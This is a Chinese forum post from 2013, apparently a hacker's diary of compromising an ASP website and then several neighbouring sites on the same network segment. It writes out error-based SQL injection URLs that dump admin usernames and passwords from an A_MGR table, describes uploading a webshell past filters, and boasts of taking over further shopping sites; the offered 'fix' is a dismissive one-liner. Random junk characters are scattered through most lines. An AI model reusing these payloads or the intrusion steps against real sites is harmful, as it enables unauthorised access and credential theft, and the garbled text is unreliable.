发现一个注入点5 ^" ]* r" v& Y0 y
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833890 @% o" Y1 X8 L! n) w
* v& H) B3 {# E习惯性的加’having1=1--* z, S; N- {: ?- Z8 E4 D1 B
, R9 D) u' A, b$ Jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
" \6 e+ u; V8 |/ q9 _! A7 G6 q' D8 g6 x6 B' X) U' ^
0% |) j. ~* X$ [7 m6 E6 t2 _
, |8 m. ~2 {2 |; \
爆出Diary_A.dl_Title(这时候很激动啊): \* Y e4 z) a7 v" Z4 T
4 T- K9 v8 O% G8 o) M9 G
那么继续9 E& _' q9 k* h5 C* ^& [
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—# a9 v. `% E: u' z) P* E
. I$ B$ G' g+ ^+ `继续,一直爆下去
@- X. l+ r, a/ ?# {4 @' n1 [; l. D' n3 C0 p, n
爆到几个字段和表段 但是没找到需要的管理用户的字段
6 k$ l+ G& N' ?- Z6 f! F, ^9 n# p6 |) O! {% Q/ c6 R
蛋疼了 怎么办 然后去后台登陆页看源码
9 |7 F2 i. T+ W! e9 O" X, k/ P5 G3 X: W( p6 ?5 [3 u
0/ ?% G+ U8 f$ j3 y2 g Y2 k, f8 L5 a
( j: f5 o" H$ \7 s* \
Input name= “ADUID”
% E* T9 E" n! I+ t+ r. T" h9 K8 `Input name= “ADPWD”* Y+ W9 g' s+ ]# @ M
3 q% {$ r0 [; A) T% k6 ]; Y( O1 w& b
很幸运 找到了字段那就继续
/ I7 t" s1 b: E, B0 s& ?找到之后开始爆用户. g6 _8 n- Q' r/ |/ Y% `
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
4 C8 P1 ^8 N) q1 a. d爆密码" N5 F$ }: F; J6 e' G: d5 T5 B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
5 B6 _4 A6 ^# _5 @. f测试了下 这个注入点只能爆到文章哪里的表
- R; X# Y7 g! ~! C8 X& m- Q
7 K9 b$ ?3 X2 T) c# o头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了1 L# ^5 T- C8 v$ E9 p$ U
' B- x7 l5 [- w
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
: X" w' A6 O8 i. @- D5 J& z- g* t! y, \2 {/ Z
473
. T4 T6 i( x3 o$ h6 V
2 B o/ z% V+ {9 o1 N$ v进后台
- f! ^6 n' S( n: X O- g: e, Q9 h7 l0 l2 ]) h1 j5 ~+ U/ c/ g
$ ~4 ^/ K# Y$ i0 r* o4 F9 N3 E发现几个上传点 有的地方不能上传 而且防止恶意代码( j! S% r+ n% C2 Y6 |" f8 H
0 G# O" o0 c. q2 X' a/ M
没办法 各种百度各种找大牛 找到一只好像可以突破的马3 X3 z# P6 d3 i/ g5 ?! m) |
) v4 l1 }, D9 j
& C3 i; X1 y; a6 I在系统管理那里直接上传 不过没有显示地址
7 @* N! |% b" J+ V# N3 x9 d- m) D, ?2 J3 U4 v
再上传一次 抓包 搞定OK
5 d5 g$ L% s" V) m/ D ` O& ~( h. X: D2 i
' q; Z" I- y4 v& a6 q+ W( v8 Y+ Y6 e! o' `4 T9 K5 z
472
$ Y( k. O, u E
4 v( Z# ], P9 d晚上不行了 去睡觉。。。- _, c8 q9 j: {3 M% ~7 x2 I* m, @
第二天刚起床 闲的没事做继续日站吧 2 ]: B2 r1 k, _1 u6 g- x# A2 R
0 `1 D+ W0 ^6 `8 r. [' t/ ?
找个站 就把这个站的旁c扫了下
, p6 c* v# W' a& d" g& C o" [, |
" M9 {$ J% V( N! P3 b$ k1 `0 x发现c段也有一个购物站 ,然后还和这个站的模板差不多
2 U; b% k( i* N" j% X; H, {0 f
3 j' V2 A; l$ q& C就找到会员登录口测试0 }' i+ o: M8 ^6 e* C" k, |# G1 `1 w6 `
9 R: @+ |1 V: `- L ?% G'and (select top 1 MGR_UID from A_MGR)>0—
- x- S7 T: M3 x- j. g5 Q8 t! W% R果断爆到了 这时候我很激动 通杀% o5 L$ k8 z; g, A: ?
0 d s6 C1 a, x# z
再次翻c段; Y: x: m8 h: n$ w" w
, y6 X: v9 @8 R# p( c% P翻出几个站 都成功拿下
5 \6 \2 c, Z1 z1 U) a J8 Q% B/ |2 a
) O; W* h) a" T& R% D! b1 H2 o1 J7 \
修复方案:7 [+ b% y* l* x3 M. U# B. N
他们比我专业
+ J1 l+ Z0 X' I' g% X. v$ S v) C* j l, p+ D e
- M2 o- L" k" e2 c! D' }8 Y# b( G: x( C' U5 Q, T
|
发表于 2013-4-4 17:40:38
收藏
支持
反对